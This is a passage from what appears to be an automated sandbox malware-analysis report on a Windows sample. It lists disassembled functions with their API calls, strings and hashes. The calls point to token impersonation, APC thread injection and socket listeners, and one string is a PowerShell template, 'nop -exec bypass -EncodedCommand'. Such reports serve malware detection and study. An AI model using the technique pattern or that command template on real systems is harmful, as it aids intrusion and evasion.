                        • _snprintf.LIBCMT ref: 00A47734
                        Strings
                        • nop -exec bypass -EncodedCommand "%s", xrefs: 00A474D7
                        • not create token: %d, xrefs: 00A47657
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$_errno_invalid_parameter_noinfo
                        • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                        • API String ID: 3442832105-3652497171
                        • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                        • Instruction ID: 69f5eba8dc515f2359dc0cda0579de60d9f072c6de636e5501b0738ebb29cea1
                        • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                        • Instruction Fuzzy Hash: FA32B66A618EC592EB15CF2DE1012E9A3B0FFD9799F445101EF8917B25EF38D2A6C340
                        Function 00CF0F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessAsUserA.ADVAPI32 ref: 00CF0F8F
                        • GetLastError.KERNEL32 ref: 00CF0F9D
                        • GetLastError.KERNEL32 ref: 00CF0FC1
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFE81
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFEA9
                        • CreateProcessA.KERNEL32 ref: 00CF1013
                        • GetLastError.KERNEL32 ref: 00CF101D
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF1374
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF1388
                        • CreateProcessWithTokenW.ADVAPI32 ref: 00CF13D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                        • String ID:
                        • API String ID: 3044875250-0
                        • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                        • Instruction ID: 8d69d2bb97bb515e938f17971665a9d81753eca2575571f9a2e1b8c27a7138d7
                        • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                        • Instruction Fuzzy Hash: FE61AD32604B88D6EB60CFA2E48436E73B1F788B94F54412AEF5983B54DF79C594CB21
                        Function 00CF9220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CF924F
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • _snprintf.LIBCMT ref: 00CF9267
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • FindFirstFileA.KERNEL32 ref: 00CF9272
                        • free.LIBCMT ref: 00CF927E
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • malloc.LIBCMT ref: 00CF92CE
                        • _snprintf.LIBCMT ref: 00CF92E6
                        • free.LIBCMT ref: 00CF930E
                        • FindNextFileA.KERNEL32 ref: 00CF9327
                        • FindClose.KERNEL32 ref: 00CF9338
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                        • String ID: %s\*
                        • API String ID: 2620626937-766152087
                        • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                        • Instruction ID: b6a12538526c5f4e08104ef6d7d0c1bc6953d216b7c78d8f7ec43d58c7280e5e
                        • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                        • Instruction Fuzzy Hash: 8931F2213042C916DA599BA36C103B9BB61F74AFE0F884122DFE90B7A6CE3DC553D715
                        Function 00401A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • RtlCaptureContext.KERNEL32 ref: 00401A84
                        • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                        • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                        • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                        • GetCurrentProcess.KERNEL32 ref: 00401B34
                        • TerminateProcess.KERNEL32 ref: 00401B42
                        • abort.MSVCRT ref: 00401B48
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                        • String ID: @5E
                        • API String ID: 4278921479-727458683
                        • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                        • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                        • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                        • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                        Function 00CF3A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32 ref: 00CF3ACE
                        • GetProcAddress.KERNEL32 ref: 00CF3ADE
                          • Part of subcall function 00CF3984: malloc.LIBCMT ref: 00CF39C2
                          • Part of subcall function 00CF3984: free.LIBCMT ref: 00CF3A45
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF3B10
                        • Thread32Next.KERNEL32 ref: 00CF3B7A
                        • Sleep.KERNEL32 ref: 00CF3B90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                        • String ID: NtQueueApcThread$ntdll
                        • API String ID: 1427994231-1374908105
                        • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                        • Instruction ID: b0d5278350986998bc6d78145ba2cf4ea49e73f3ce3ee65e2b672fb46e025174
                        • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                        • Instruction Fuzzy Hash: BC418C32701B49AAEB60CB62E8503AD73B5FB48B88F54412ADF5D57B48EF38C645C741
                        Function 00CF6A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: bindclosesockethtonsioctlsocketlistensocket
                        • String ID:
                        • API String ID: 1767165869-0
                        • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                        • Instruction ID: b11e4fdff9b3891d31bdaec59222839bb99c96ee32f153476df2343deab15df8
                        • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                        • Instruction Fuzzy Hash: A611303130079882EB208F02A450379B7A1F388FA4F884635DF6A437A4CF3DC84A8701
                        Function 00CF6670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                        • String ID:
                        • API String ID: 3910169428-0
                        • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                        • Instruction ID: f4a24f7cc0198e005c007e1b5a22a66d0c2d5cb7f1712744c939ab1f0a883cf7
                        • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                        • Instruction Fuzzy Hash: F4110036320B4492E724AF22E8543A93721F788BA4F50423ADF2A433E0DF3DC95AC710
                        Function 00CFDF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00CFDCC0: RevertToSelf.ADVAPI32 ref: 00CFDCDD
                        • LogonUserA.ADVAPI32 ref: 00CFDF98
                        • GetLastError.KERNEL32 ref: 00CFDFA2
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFE81
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFEA9
                          • Part of subcall function 00CED044: malloc.LIBCMT ref: 00CED057
                        • ImpersonateLoggedOnUser.ADVAPI32 ref: 00CFDFC0
                        • GetLastError.KERNEL32 ref: 00CFDFCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                        • String ID: %s\%s
                        • API String ID: 3621627092-4073750446
                        • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                        • Instruction ID: ca370b5ffc99df62884a0ae5832ba9b4726097c5fefd2f27c4824f8efec585e1
                        • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                        • Instruction Fuzzy Hash: 41317C30314B8481FB40EBA2F85076A73A2E799BC0F90402AEA4E47766DF3CC645D751
                        Function 00CEFA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountSleepTick$closesocket
                        • String ID:
                        • API String ID: 2363407838-0
                        • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                        • Instruction ID: 721c36cf9b457249004a6ea5069e556ad13188b20c873d34d909c37945fe9fde
                        • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                        • Instruction Fuzzy Hash: 7A11C02170468482DA10EB63F45126EA3A1F785BB0F444736AEBE47BE5DE3CC60A9751
                        Function 00CFEE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: bindclosesockethtonslistensocket
                        • String ID:
                        • API String ID: 564772725-0
                        • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                        • Instruction ID: a8a69d8607a311f7142aea74ecf11e140a8bfbaa98244f7798c1c9d21572e562
                        • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                        • Instruction Fuzzy Hash: 9B11043661479882EB20AF92E81532AB361F784FE0F444326EFA907BE4CF3DC1058705
                        Function 00CED83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s!%s
                        • API String ID: 0-2935588013
                        • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                        • Instruction ID: a2a0252f50a152c23dd7d9ee41e7eb5741a26dd01cfc1dfdc6b632061a0e5e49
                        • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                        • Instruction Fuzzy Hash: BB5169762046C086DB24DF67D4406A97361F388F98F848126EF9B5B749DF38CA82D754
                        Function 00CF0B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueA.ADVAPI32 ref: 00CF0BEA
                        • AdjustTokenPrivileges.ADVAPI32 ref: 00CF0C1A
                        • GetLastError.KERNEL32 ref: 00CF0C24
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                        • String ID: %s
                        • API String ID: 4244140340-620797490
                        • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                        • Instruction ID: 54e14a18bc7901120227c98c5352d216e85d1373524c87e2b478da3897f78e73
                        • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                        • Instruction Fuzzy Hash: 9A216672B00B449AEB54DBB1D4447EC33B5F758B88F84452ACE4D93A49EF74C629C381
                        Function 00CF5854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • GetTickCount.KERNEL32 ref: 00CF587B
                        • Sleep.KERNEL32 ref: 00CF58CA
                        • GetTickCount.KERNEL32 ref: 00CF58D0
                        • WSAGetLastError.WS2_32 ref: 00CF58DA
                          • Part of subcall function 00CF5A20: ioctlsocket.WS2_32 ref: 00CF5A42
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$ErrorLastSleepioctlsocket
                        • String ID:
                        • API String ID: 1121440892-0
                        • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                        • Instruction ID: a2f00ee3de162a34f5fed113c435a8a8747d7774d86fb796be06ea0018c09cd0
                        • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                        • Instruction Fuzzy Hash: C4316836B00F44D6DB00DBA2E4802AC77B5F389BA0F51462ADF6D93794DE31C516D350
                        Function 00A5B7B0 Relevance: 5.9, Strings: 4, Instructions: 884COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $<$ailure #%d - %s$e '
                        • API String ID: 0-963976815
                        • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction ID: 432c8573868ccf9c3b9222bd77abfd94067db74583fe4831938f4fd8c2bfffa3
                        • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction Fuzzy Hash: BE92E3B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                        Function 00CEDA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00CF6114: htonl.WS2_32 ref: 00CF6131
                        • GetLastError.KERNEL32 ref: 00CEDD33
                          • Part of subcall function 00CFCC00: GetCurrentProcess.KERNEL32 ref: 00CFCC8D
                        • HeapCreate.KERNEL32 ref: 00CEDCDA
                        • HeapAlloc.KERNEL32 ref: 00CEDCF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                        • String ID:
                        • API String ID: 3419463915-0
                        • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                        • Instruction ID: 0ea99ec669875a9e62a2ae24709a1a0f8152073f3a96065418ec25ea0c147df3
                        • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                        • Instruction Fuzzy Hash: 5BE1A072B10B8587EB24DB76EC413AA63A1F798794F088125DB9B97B51EF3CE546C300
                        Function 00402314 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: signal
                        • String ID:
                        • API String ID: 1946981877-0
                        • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                        • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                        • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                        • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                        Function 00CFDEC8 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32 ref: 00CFDF17
                        • CheckTokenMembership.ADVAPI32 ref: 00CFDF2E
                        • FreeSid.ADVAPI32 ref: 00CFDF3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                        • Instruction ID: 8d9e90ed81e9e2f54d781b20cef7428f6b7301b1a0ad0cb99f0ef72f5a2b52ab
                        • Opcode Fuzzy Hash: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                        • Instruction Fuzzy Hash: 1A015E73624A818FE7208F60E4453AD33B0F35876FF010A09F64946A99CB7DC258CB40
                        Function 00D0C3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $<
                        • API String ID: 0-428540627
                        • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction ID: b83ab5ce66adced79a1a4d67c40fef37e5a5c89251c8ab07d7f3aa5e69051cf3
                        • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction Fuzzy Hash: 4592C0B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                        Function 00CF1268 Relevance: 3.0, APIs: 2, Instructions: 32processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessWithLogonW.ADVAPI32 ref: 00CF12B7
                        • GetLastError.KERNEL32 ref: 00CF12C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastLogonProcessWith
                        • String ID:
                        • API String ID: 2609480667-0
                        • Opcode ID: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
                        • Instruction ID: 7b2ec0954316832a2d248c6d811307ad095411e9199bc65c3d948fbdf36974bb
                        • Opcode Fuzzy Hash: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
                        • Instruction Fuzzy Hash: A801BBB6714B0882EB509BA6E44576933F5F31DB94F14012ADE5C8B350DF3AC896C764
                        Function 00A5C397 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ailure #%d - %s$e '
                        • API String ID: 0-4163927988
                        • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction ID: 79928476b3a5b5ef2efbc9a71b6b5585f66fc8d0a5dff000dc2870acf233270f
                        • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction Fuzzy Hash: C0510DB63146508BD714CB0DE4A072AB7E1F3CD794F88421AE78B87768DA3DD545CB40
                        Function 00D0DBF0 Relevance: .6, Instructions: 617COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction ID: 0ad5d8e8ed065da4df70a57f19b8d946f015599ea69095d61e9c8b372286e047
                        • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction Fuzzy Hash: 5F526FB22149418BD708CB1CE4A177AB7E2F3C9B80F44852AE78B8B799CE3DD551CB50
                        Function 00A5CFF0 Relevance: .6, Instructions: 617COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction ID: 0992728a46ce55adaa6a73d74a8388e49ae3550b8e6b6aeb91e095bc88745d2f
                        • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction Fuzzy Hash: 94522CB2318A458AD708CB1CE4B173AB7A1F3C9B80F44852AE7978B799CE3DD554CB40
                        Function 00D0D280 Relevance: .6, Instructions: 592COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction ID: 18481e6eb7c303b71b5155cc9a3a083456c5632b616092c5af99dcffe63d3dc2
                        • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction Fuzzy Hash: 1E5253B221498097D708CF1DE4A177AB7E2F3C9B80F44852AE7868B799CE3DD545CB50
                        Function 00A5C680 Relevance: .6, Instructions: 592COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction ID: b3d0bfe3eb4821164573e9b6700462846ed1b6209ce06708d15cf249783ddf58
                        • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction Fuzzy Hash: 185232B23146818BD708CB1DE4A173AB7F1F3C9B80F44852AE7868B799CA3DD545CB40
                        Function 00CEA280 Relevance: .4, Instructions: 404COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
